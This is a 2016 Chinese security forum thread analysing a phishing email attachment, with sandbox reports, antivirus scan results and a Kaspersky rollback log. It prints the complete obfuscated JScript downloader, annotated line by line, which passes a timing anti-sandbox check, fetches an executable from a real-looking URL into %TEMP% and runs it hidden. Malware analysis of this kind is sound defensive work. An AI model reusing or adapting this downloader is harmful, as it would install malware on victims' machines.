
[病毒样本] 邮箱附件,已鉴定为病毒

Autonomous
发表于 2016-3-29 18:50:55 | 显示全部楼层 |阅读模式
本帖最后由 Autonomous 于 2016-3-30 18:41 编辑

刚吃完饭时收到一个邮件,说让我查看一个 invoice,附件压缩包里包含两个文件,一个是 js,另一个后缀名是 x

其中,d91fc.js文件可由文本编辑器直接打开:

[mw_shl_code=javascript,true]var Ntuhecwob = false;
// NOTE(review): obfuscated JScript downloader exactly as posted; annotated for analysis only, code untouched.
// Ntuhecwob is the "running under Windows Script Host on Windows" flag. It is only set to true by the
// conditional-compilation block below (the _win32/_win64 test), and the whole payload further down is
// gated on it, so on any engine that does not honour conditional compilation the script does nothing.
var Nwfcsc = "CreateObject"; // method name resolved dynamically: WScript[Nwfcsc](...) is WScript.CreateObject(...)
var Xorjijbxoc = function Mgzibamr() {return WScript[Nwfcsc]("WScript.Shell");}(); // WScript.Shell instance, used later for Run() and ExpandEnvironmentStrings()
var Vdvwqx = 123213; // not referenced anywhere in this listing (padding)
var Ohtselho = "MSXML2.XMLHTTP"; // ProgID of the HTTP client the payload creates
var Upbgsig = 2123213; // not referenced anywhere in this listing (padding)
var Vgnixtcg = 0; // the constant 0, reused throughout as a 0/false literal
// Launches the given command line through WScript.Shell.Run. Both trailing arguments are 0
// (Vgnixtcg), i.e. window style 0 (hidden) and "do not wait for the process to exit".
function Vpznew(Kexfgpv){Xorjijbxoc["Run"](Kexfgpv, Vgnixtcg, Vgnixtcg);};
// Returns the ProgID string "MSXML2.XMLHTTP" (indirection to hide the literal from simple scanners).
function Biwuibbnmk(){return Ohtselho;};
// Plain subtraction, Pwuohon - Qftsmrf; used by the timing probe to compute millisecond deltas.
function Gxeguwu(Pwuohon, Qftsmrf){return Pwuohon - Qftsmrf;};
// Returns the method name "CreateObject" (same indirection trick as Biwuibbnmk).
function Wuamxcu(){return Nwfcsc;};
// JScript conditional compilation: engines without it see only a comment and Ntuhecwob stays false;
// under WSH JScript on 32-bit or 64-bit Windows the inner assignment runs and arms the payload.
/*@cc_on
  @if (@_win32 || @_win64)
    Ntuhecwob = true;
  @end
@*/
if (Ntuhecwob)
{
// Everything below runs only when the conditional-compilation flag above was set (WSH JScript on Windows).
var Rtnlllilo = ""; // becomes "open" inside Idtjpeaffp(); later used as the method name for XMLHTTP.open and ADODB.Stream.Open
function Npwkosm(){return 22;}; // the constant 22: sleep length in ms, probe-loop bound, and (x11) the polling interval
var Awimhkeatd = 0; var Hrqnwpqsq = 0; // outer copies; the "var" re-declarations inside Idtjpeaffp shadow them, so these stay 0
// Timing probe: reads the UTC millisecond field three times with a 22 ms Sleep between reads and
// returns (delta1 - delta2), i.e. 0 when both sleeps measured exactly the same elapsed time.
// Side effect: sets Rtnlllilo to "open". Presumably an anti-emulation check — a stubbed Sleep or a
// frozen clock yields identical deltas, the flags below never get set and the download never happens;
// confirm against sandbox behaviour.
function Idtjpeaffp()
{
var Aenqgobt = new this["Date"]();
var Ujlxetxch = Aenqgobt["getUTCMilliseconds"](); // reading 1
WScript["Sleep"](Npwkosm());
var Aenqgobt = new this["Date"]();
var Ljgbxrdt = Aenqgobt["getUTCMilliseconds"](); // reading 2
WScript["Sleep"](Npwkosm());
var Aenqgobt = new this["Date"]();
var Toelaxxa = Aenqgobt["getUTCMilliseconds"](); // reading 3
var Awimhkeatd = "Vuslmobcu"; // function-local, shadows the outer variable; the string is overwritten on the next line
Awimhkeatd = Gxeguwu(Ljgbxrdt, Ujlxetxch); // delta1 = reading2 - reading1
var Hrqnwpqsq = "Vslmh"; // function-local, shadows the outer variable
Hrqnwpqsq = Gxeguwu(Toelaxxa, Ljgbxrdt); // delta2 = reading3 - reading2
Rtnlllilo = "open";
return Gxeguwu(Awimhkeatd, Hrqnwpqsq); // delta1 - delta2
}
var Kokwzaygsj = false;
var Demzbv = false;
// Up to 22 probes; the first non-zero result arms both flags and leaves the loop.
for (var Oexwevbvo = Vgnixtcg; Oexwevbvo < Npwkosm() * 1; Oexwevbvo++){if (Idtjpeaffp() != Vgnixtcg){
Kokwzaygsj = true;
Hrqnwpqsq = "31" + 11 * Awimhkeatd + Hrqnwpqsq; // outer Awimhkeatd is still 0 here; the resulting string is not read again in this listing
Demzbv = true;
break;
}}
function Gdjpob() {return ((Kokwzaygsj == true) && (Kokwzaygsj == Demzbv)) ? 1 : Vgnixtcg;}; // 1 when both flags are set, else 0
if (Kokwzaygsj && Gdjpob() && Demzbv){ // all three conditions express the same "timing probe passed" state
function Wductbew() {return Xorjijbxoc["ExpandEnvironmentStrings"]("%TEMP%/") + "E69VQhUZVgtIRjRI.exe";}; // drop path: %TEMP%/E69VQhUZVgtIRjRI.exe (note the forward slash)
Ixleqyqqgb = Biwuibbnmk(); // "MSXML2.XMLHTTP" (implicit global, no var)
Tlrimzvmnv = WScript[Nwfcsc](Ixleqyqqgb); // XMLHTTP client (implicit global)
var Zjcvk = 1;
// Download loop: retried indefinitely; every exception (no network, name resolution failure, ...) is swallowed and the request is re-issued.
while (Zjcvk){
try {
Tlrimzvmnv[Rtnlllilo]("GET", "http://importtoys.nl/d9owla", false); // synchronous GET of the payload URL (Rtnlllilo is "open" by now)
Tlrimzvmnv["send"]();
Sznnpk = "Sleep";
do {WScript[Sznnpk](Npwkosm() * 11)} while (Tlrimzvmnv["readystate"] < 2 * 2); // poll every 242 ms until readyState reaches 4 (complete)
Zjcvk = Vgnixtcg; // success: leave the retry loop
} catch(Iksdcley){}; // error ignored; loop continues
}
function Wfbni(Dqgyinph) {var Fbzqrlhv = (1, 2, 3, 4, 5, Dqgyinph); return Fbzqrlhv;}; // comma operator: returns its argument unchanged
Qykdrbt = WScript[Wuamxcu()]("ADODB.Stream"); // ADODB.Stream (implicit global); Ixleqyqqgb below aliases the same object
Ixleqyqqgb = Qykdrbt;
Ixleqyqqgb[Rtnlllilo](); // Stream.Open()
Ixleqyqqgb["type"] = Wfbni(1); // Type = 1 (adTypeBinary)
Ixleqyqqgb["write"](Tlrimzvmnv["ResponseBody"]); // write the raw HTTP response body into the stream
Qykdrbt["position"] = Wfbni(Vgnixtcg); // rewind to position 0
Ixleqyqqgb["Save" + "ToFile"](Wductbew(), 2); // SaveToFile(path, 2 = adSaveCreateOverWrite): writes the downloaded file to %TEMP%
Qykdrbt["c"+"lose"](); // Close()
Xwxojrgsha = Wductbew();
Vpznew(Xwxojrgsha); // run the dropped file with a hidden window — the E69VQhUZVgtIRjRI.exe analysed later in this thread
}
}[/mw_shl_code]



以下为可疑文件,解压密码为 suspicious

Autonomous
 楼主| 发表于 2016-3-29 18:59:13 | 显示全部楼层
以下是这两个文件的在线分析结果:

d91fc.js:

哈勃分析系统:高度风险


关键行为有:
[mw_shl_code=css,true]行为描述:        设置特殊文件夹属性
详情信息:       
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
C:\Documents and Settings\Administrator\IETldCache
行为描述:        获取TickCount值
详情信息:       
TickCount = 544250, SleepMilliseconds = 60000.
TickCount = 544296, SleepMilliseconds = 60000.
TickCount = 544312, SleepMilliseconds = 60000.
TickCount = 544343, SleepMilliseconds = 60000.
TickCount = 544375, SleepMilliseconds = 60000.
TickCount = 544437, SleepMilliseconds = 60000.
TickCount = 544453, SleepMilliseconds = 60000.
TickCount = 544468, SleepMilliseconds = 60000.
TickCount = 544484, SleepMilliseconds = 60000.
TickCount = 544500, SleepMilliseconds = 60000.
TickCount = 544515, SleepMilliseconds = 60000.
TickCount = 544531, SleepMilliseconds = 60000.
TickCount = 544546, SleepMilliseconds = 60000.
TickCount = 544562, SleepMilliseconds = 60000.
TickCount = 544718, SleepMilliseconds = 60000.[/mw_shl_code]




金山火眼:

其他行为监控
行为描述:IE 代理服务器设置
附加信息:关闭IE代理服务

网络操作
[HTTP Request]GET importtoys.nl/d9owla
[Open URL]importtoys.nl






VirSCAN:扫描结果:2%的杀软(1/39)报告发现病毒

SOPHOS        5.17        3.60.0        2015-08-01        Mal/JSDldr-B

haol
发表于 2016-3-29 19:01:16 | 显示全部楼层
本帖最后由 haol 于 2016-3-29 19:05 编辑

從樓主文件下載的執行檔

Autonomous
 楼主| 发表于 2016-3-29 19:03:03 | 显示全部楼层
WLl.x:

金山火眼:

其他行为监控
行为描述:查找文件
附加信息:"C:\Program Files""%ProgramFiles%\.*""%windir%\.*""%system%\Wbem\.*""%system%\.*"
行为描述:遍历磁盘类型
附加信息:C:





VirSCAN:
扫描结果:0%的杀软(0/39)报告发现病毒
Autonomous
 楼主| 发表于 2016-3-29 19:07:52 | 显示全部楼层
haol 发表于 2016-3-29 19:01
從樓主文件下載的執行檔

E69VQhUZVgtIRjRI.exe的在线扫描结果:

哈勃:未发现风险

[mw_shl_code=css,true]行为描述:        设置特殊文件夹属性
详情信息:       
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
行为描述:        获取TickCount值
详情信息:       
TickCount = 532781, SleepMilliseconds = 47000.
TickCount = 532843, SleepMilliseconds = 47000.
TickCount = 532859, SleepMilliseconds = 47000.
TickCount = 532875, SleepMilliseconds = 47000.
TickCount = 532890, SleepMilliseconds = 47000.
TickCount = 532906, SleepMilliseconds = 47000.
TickCount = 532921, SleepMilliseconds = 47000.
TickCount = 532937, SleepMilliseconds = 47000.
TickCount = 532953, SleepMilliseconds = 47000.
TickCount = 532968, SleepMilliseconds = 47000.
TickCount = 532984, SleepMilliseconds = 47000.
TickCount = 533156, SleepMilliseconds = 47000.
TickCount = 533218, SleepMilliseconds = 47000.
TickCount = 533234, SleepMilliseconds = 47000.
TickCount = 533250, SleepMilliseconds = 47000.[/mw_shl_code]




VirSCAN:扫描结果:5%的杀软(2/39)报告发现病毒

F-PROT        4.6.2.117        6.5.1.5418        2016-02-05        W32/Felix:CO:VC!Eldorado        1
奇虎360        1.0.1        1.0.1        1.0.1        HEUR/QVM20.1.Malware.Gen        6
saga3721
发表于 2016-3-29 19:22:14 | 显示全部楼层
文件 ID         文件名         大小(字节)         结果
28769526         E69VQhUZVgtIRjRI.exe         163 KB         UNDER ANALYSIS
28769538         d91fc.js         2.41 KB         UNDER ANALYSIS
28769539         WLl.x         4.5 KB         UNDER ANALYSIS
cfhdrty
发表于 2016-3-29 19:44:57 | 显示全部楼层
本帖最后由 cfhdrty 于 2016-3-29 19:57 编辑

卡巴斯基运行约4分钟后,主动防御查杀了衍生物并回滚了其操作。这个,难道是报了两次毒而且回滚了两次?那几个注册表值好像被回滚了两次,要被玩坏了
[mw_shl_code=css,true]29.03.2016 19.37.18        恶意程序的操作已回滚        not-a-virus:PDM:RiskTool.Win32.DelShad.ra        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\connections\savedlegacysettings        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\connections\savedlegacysettings        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_LOCAL_MACHINE\system\controlset001\hardware profiles\0001\software\microsoft\windows\currentversion\internet settings\proxyenable        对象: HKEY_LOCAL_MACHINE\system\controlset001\hardware profiles\0001\software\microsoft\windows\currentversion\internet settings\proxyenable        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\autoconfigurl        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\autoconfigurl        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyoverride        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyoverride        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyserver        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyserver        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyenable        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyenable        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\migrateproxy        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\migrateproxy        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.00        恶意程序已删除        not-a-virus:PDM:RiskTool.Win32.DelShad.ra        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.00        检测到恶意程序        not-a-virus:PDM:RiskTool.Win32.DelShad.ra        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.36.59        恶意程序的操作已回滚        PDM:Trojan.Win32.Generic        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_LOCAL_MACHINE\system\controlset001\hardware profiles\0001\software\microsoft\windows\currentversion\internet settings\proxyenable        对象: HKEY_LOCAL_MACHINE\system\controlset001\hardware profiles\0001\software\microsoft\windows\currentversion\internet settings\proxyenable        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\connections\savedlegacysettings        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\connections\savedlegacysettings        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyenable        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyenable        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyserver        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyserver        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyoverride        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyoverride        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\autoconfigurl        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\autoconfigurl        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\migrateproxy        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\migrateproxy        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.42        恶意程序已删除        PDM:Trojan.Win32.Generic        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.06        恶意程序已终止        PDM:Trojan.Win32.Generic        应用程序名称: Advanced Task Scheduler 32-bit Edition        应用程序路径: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.04        检测到恶意程序        PDM:Trojan.Win32.Generic        应用程序名称: Advanced Task Scheduler 32-bit Edition        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36[/mw_shl_code]

pal家族 + 1 正常的我也经常遇到


icedream89
发表于 2016-3-29 19:59:34 | 显示全部楼层
ess9

Luca.l
发表于 2016-3-29 20:01:00 | 显示全部楼层

liu浪的人
发表于 2016-3-29 20:33:32 | 显示全部楼层
